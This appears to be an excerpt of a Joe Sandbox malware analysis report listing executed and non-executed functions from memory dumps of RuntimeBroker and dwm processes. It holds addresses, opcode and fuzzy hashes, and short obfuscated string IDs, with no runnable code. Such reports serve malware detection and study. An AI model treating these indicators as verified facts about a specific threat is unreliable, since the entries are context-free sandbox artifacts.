                                                                      • Opcode ID: 3c4cd9674803294a6d4943c8c5f27e4f874474576acdfc688e54f3063f32c895
                                                                      • Instruction ID: 653cabfffc133f26625d98582cf8a5d31946d542da9f513f820922ddcc4ccd9c
                                                                      • Opcode Fuzzy Hash: 3c4cd9674803294a6d4943c8c5f27e4f874474576acdfc688e54f3063f32c895
                                                                      • Instruction Fuzzy Hash: 7931D466A0E649DFE715AB68D8451EC7FA0EF82351F1585B7D00CC62E3D9382589C7C1
                                                                      Function 00007FFAAB4769E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a16b37f9c3c0f8461763b930c2d3fe77d021617503e40f53a777d2aef120ff30
                                                                      • Instruction ID: b85d5504049e6f2a2b21af68fa0d90725cc297c4beedf4b0399f1996eceee8b6
                                                                      • Opcode Fuzzy Hash: a16b37f9c3c0f8461763b930c2d3fe77d021617503e40f53a777d2aef120ff30
                                                                      • Instruction Fuzzy Hash: 3421EB70D18569CFEB65DB08C454BA9B3E1FB59314F1085EAC40EE3291CA79AEC4CB80
                                                                      Function 00007FFAAB470C38 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction ID: c306b72b7be54ba8e2b197199eed880950137f82dda53802c80e2249acc0d12c
                                                                      • Opcode Fuzzy Hash: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction Fuzzy Hash: DF11A036A0E789DFE706DB68C8551AC7FB0EF43251F1584B7D048DB2A2D538568AC7C1
                                                                      Function 00007FFAAB470C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction ID: 11a590a174681ac3eea44667523e8970f4d37835ed70dcc31b1341a65cced8f7
                                                                      • Opcode Fuzzy Hash: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction Fuzzy Hash: 4101CB32A0E788DFE70ADB68C8540A87FB0EF42250F0480B7D048DB2A2D5385A89C781
                                                                      Function 00007FFAAB470C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction ID: 5ac0458d7093ce37c656ae7377ba6151b46a1aabc89cd76a794a13be113f5d20
                                                                      • Opcode Fuzzy Hash: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction Fuzzy Hash: 45018C7590E389DFE70ADB68C8541A9BFB0EF42350F1981E7D048DB2A2D5385A89C781
                                                                      Function 00007FFAAB470B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 5d6e81b34bc9f67479e3927315d3e938a9b7610a88fad50f39688fefc833bcb4
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: D3D012345768498FC650E728D9954A4BB90FB0A214F8901D0D40CC7161D3569894C741
                                                                      Function 00007FFAAB4706A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: 9182ade74973473efd9a91cb18fcff3fe863572f8a8b4ccf94988b8c2aa409b5
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: DEC08C00E0B40B83B810B33E14120ACA9006BC7290FD08032C10C802E19C4E20DD81C6
                                                                      Function 00007FFAAB4712B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 43e346325f29e7365e5b0cbc07af6b3bfadc9982b9ec397910975f9166f44ce6
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: A0C04C345519498FC948EB29C88591477A0FB1A215BD600D0E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB473416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc1ceef3d86fe50290ccc0c1ba0d8f8342fc2a340b2f10a5b1fbcf2a56d0c246
                                                                      • Instruction ID: d2d56d59261cb8329efd9c62606e869023119a89cc130d1bf167deef540700c7
                                                                      • Opcode Fuzzy Hash: dc1ceef3d86fe50290ccc0c1ba0d8f8342fc2a340b2f10a5b1fbcf2a56d0c246
                                                                      • Instruction Fuzzy Hash: 79C08C42F09C6683F219AA28C03163F04429F80648F8404B0E00EC63C6CC0C6F0142C2
                                                                      Function 00007FFAAB473A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 6db26826a2423f8c86332fdba027ea285eabc923419afa289c2718a17ee9d05b
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 83C02B10C0E004C3E329873044051FD31401F5A300F05C172C00E52091DE28244C91C0
                                                                      Function 00007FFAAB4706C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: a5735ffe0b8818d5644c87d865a7e8281c1521c7f2e206bd483853161b9d9d55
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 72B01200C5740F42A814337E0842064B8505B46140FC04070D40C501D5984E10EC42C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4709B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: f1b6b1557612ce2203e6a856fd12bdf7f324bb84be63622c27c12a4b2831b507
                                                                      • Instruction ID: 40cae4d5181ea78131fe2c0bbc18da0b7c6517f1a69a3b279efe9b1d56bf911b
                                                                      • Opcode Fuzzy Hash: f1b6b1557612ce2203e6a856fd12bdf7f324bb84be63622c27c12a4b2831b507
                                                                      • Instruction Fuzzy Hash: 1351D34BB4942376E11237FCF40A8FC6BA8EFD1376B494AB7D04DC91934D0968C582E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB450D4C Relevance: 6.5, Strings: 5, Instructions: 267COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5Z_H$b43$r63$r63
                                                                      • API String ID: 0-999556193
                                                                      • Opcode ID: c78fb647532b60b56b8a88db8630ac2edb317b7c552bcbfad58d42df461483cf
                                                                      • Instruction ID: 0fd37244487eedcabaf2ef3ab66c0c73c06ab9e3b63cd79d3f2727eca447a344
                                                                      • Opcode Fuzzy Hash: c78fb647532b60b56b8a88db8630ac2edb317b7c552bcbfad58d42df461483cf
                                                                      • Instruction Fuzzy Hash: 409106B6A08A998FE789DF68C8757A97FE1FB56350F4441BEC14DC73E2CA7818148780
                                                                      Function 00007FFAAB4508D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8b01b08ecf61459951f1402fc08fab6c590433a95404cc5790c90eca68154fc
                                                                      • Instruction ID: b870b6bc90a23b9add67cbd2ca7872be046cab6a3111a16cd423a2fb10a2e75b
                                                                      • Opcode Fuzzy Hash: f8b01b08ecf61459951f1402fc08fab6c590433a95404cc5790c90eca68154fc
                                                                      • Instruction Fuzzy Hash: 0A412F3264CA648FD714FBACE4889F97BE0EF8632170549BBD08ACB063D910AC8183C1
                                                                      Function 00007FFAAB45090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65c44ebe34213f0e82be2f97b86c29ec9691fef569d38ee2753f0b51d72f3604
                                                                      • Instruction ID: b1fe7a8510dae9749c79319cb2cb978be8ec57e81a7801e55e0f30dd747b5337
                                                                      • Opcode Fuzzy Hash: 65c44ebe34213f0e82be2f97b86c29ec9691fef569d38ee2753f0b51d72f3604
                                                                      • Instruction Fuzzy Hash: D4412553A4EA956FE714B37CE05A5F97BD0DF86261B1449FED04EC61E3CD086C818281
                                                                      Function 00007FFAAB450998 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08c6728f1a8b6d71add1bda208ee08a443e4d2060fb4af297f818453c36a09c0
                                                                      • Instruction ID: 0db4638af725da169075f0f9aaaebba83fc66b4ada756ed6aef581b2d8141b0b
                                                                      • Opcode Fuzzy Hash: 08c6728f1a8b6d71add1bda208ee08a443e4d2060fb4af297f818453c36a09c0
                                                                      • Instruction Fuzzy Hash: F5311A61A0EE595FE788FB38846AAB977D2EF5A350B1441BDD40DC33E3DC18AC818381
                                                                      Function 00007FFAAB450908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b5eaada6b88119fe47a1a0dcc18818da71804f5fe425aa5b0b0764aece94a42
                                                                      • Instruction ID: faf4efb2ab944e200b9afe7d364de4d2c9b83e7877de95e667fe599b5e5e9f02
                                                                      • Opcode Fuzzy Hash: 9b5eaada6b88119fe47a1a0dcc18818da71804f5fe425aa5b0b0764aece94a42
                                                                      • Instruction Fuzzy Hash: F121D53130DC184FE768EB0CE889DB973D1EB5A32170101BAE58EC7136E911EC8287C1
                                                                      Function 00007FFAAB450960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 575cb75b5688d80c6b8503d196f636be2e4250fe5f0d58a606b3eba6cface2c4
                                                                      • Instruction ID: da89a8295f07baad562e83b883069ea3b78f08b74e70589aecacc72ff0405726
                                                                      • Opcode Fuzzy Hash: 575cb75b5688d80c6b8503d196f636be2e4250fe5f0d58a606b3eba6cface2c4
                                                                      • Instruction Fuzzy Hash: 17312652A0EA952FE754B77CE45A5B967D1DF863A1B1445FED00EC32E3CC086C414284
                                                                      Function 00007FFAAB45116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7275be86fbfc55fd6e85d0aee1cdb062e1a8650c6e0439c5ade40b20b004807c
                                                                      • Instruction ID: 3c66c8bd4e0f44d8350ba148d56d44b53f3a7eb3108720acc20ead5eebb5daa7
                                                                      • Opcode Fuzzy Hash: 7275be86fbfc55fd6e85d0aee1cdb062e1a8650c6e0439c5ade40b20b004807c
                                                                      • Instruction Fuzzy Hash: 3431E83190DA4ACFEF45EB68C8559B97BF0FF5A300B0446FED00EC71A2DA299844C781
                                                                      Function 00007FFAAB450C25 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13eea54a612a66fe4d5c0451b25578df6faf380015fa45d95976ac72a9353d0e
                                                                      • Instruction ID: 0eb793eec65b3b26ecb0dc0bc6ca4f1599837ac0bdc3533fe499a8001b13c7e3
                                                                      • Opcode Fuzzy Hash: 13eea54a612a66fe4d5c0451b25578df6faf380015fa45d95976ac72a9353d0e
                                                                      • Instruction Fuzzy Hash: C3310A7AA0DA45DBE716E768D8551EC7FA0EF83351F0486BBD00CCA2D3D938294987C1
                                                                      Function 00007FFAAB4569E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06cdbdd32651d0f4c1a1ec8a1cf2532ad167e7a570bfdf5a926b6e78c192ff04
                                                                      • Instruction ID: 1c0189a10cab81f6ccc0b0d1d47544908ddb9b5032059b3299170630c7ed728c
                                                                      • Opcode Fuzzy Hash: 06cdbdd32651d0f4c1a1ec8a1cf2532ad167e7a570bfdf5a926b6e78c192ff04
                                                                      • Instruction Fuzzy Hash: E821ED30D18959CFEB65DB04C4547A9B3E1FB59314F1086EEC40EE3295CA79AE85CB80
                                                                      Function 00007FFAAB450C38 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction ID: 2a59ae26bc7427f3c6d6ad4ad74413e2cd6fc66694184ddd4d7280093efb0704
                                                                      • Opcode Fuzzy Hash: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction Fuzzy Hash: 0C11A339A0DB49DFE716DB68C85119C7FB0EF43391F1586BBC048DB2A2D5341A4A87C1
                                                                      Function 00007FFAAB450C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction ID: 2e0e37c187032897803a567ac2cce49fc3280105f8fe4737f82a21c29a15210f
                                                                      • Opcode Fuzzy Hash: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction Fuzzy Hash: 1601E139A0EB88DFE706DB68C85019C7FB0EF43390F0586BBC048CB2A2D5341A4987C0
                                                                      Function 00007FFAAB450C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad47b41a61c876ed5843851a67f6bea352b9b274289ef60d1b7dbd82702c2550
                                                                      • Instruction ID: 245d358c4ae833b5e972c8c127fe51b1ab168c75cfa2f8e9d6807107dfa70008
                                                                      • Opcode Fuzzy Hash: ad47b41a61c876ed5843851a67f6bea352b9b274289ef60d1b7dbd82702c2550
                                                                      • Instruction Fuzzy Hash: 2101807990E789DFE706DB68C8401987FB0EF43350F1586EBD048DB2A2D5345A49C781
                                                                      Function 00007FFAAB450B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: f1f10a7582211f653d9c310832131a2cecc0f1f7495a3073e77afd64dcd0bfdd
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: EAD012345668098FC650EB38D9954A4BA90FB0A214F8901D4E40CC7161D3569894C741
                                                                      Function 00007FFAAB4506A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: c41aedb6fb691dffc037f700b64dc7446e60b9af2d2bbb701d1606af1ea6093b
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: C0C08C08E0BC0BC3F800F72E14020ACAA006FC7290FD0833AC40C402E59C0E28DD01C6
                                                                      Function 00007FFAAB4512B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: eb85e03d4dcf60242a7e97fc5875e8220b64efe062badbaf92a5322e214e82b2
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: 9AC04C34551D498FC948EB29C88595477A0FB1A215BD50194E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB453416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fd9cacd6fb424b670fa2a116b7d5f7110ea6fdfde8608179f02d2e90eae3882
                                                                      • Instruction ID: efe25e36fc002c5f071dc45843b0ee5d437ae90269452a9ec8373b5721b881fe
                                                                      • Opcode Fuzzy Hash: 0fd9cacd6fb424b670fa2a116b7d5f7110ea6fdfde8608179f02d2e90eae3882
                                                                      • Instruction Fuzzy Hash: 48C04C42F19D6697F759A628C43167F04569F8565CF9445B4E00EC63D6CD0C5F1112C6
                                                                      Function 00007FFAAB453A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 8736f29bde42d3d4b834fd5650b63b90996efaf617e23afbcb9ed29d777e89d5
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 52C02B10C0D404C3E32AC33044001FD31401F5B304F05C376C00F52091CE281C081180
                                                                      Function 00007FFAAB4506C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: e3fb3f7d20ad15394514bcac524ea82861740eef03e6e12564f572e6b514cc46
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 12B01204C57C0F83A804777E08420A478505F46140FC04274D40C40199984E18AC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4509B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
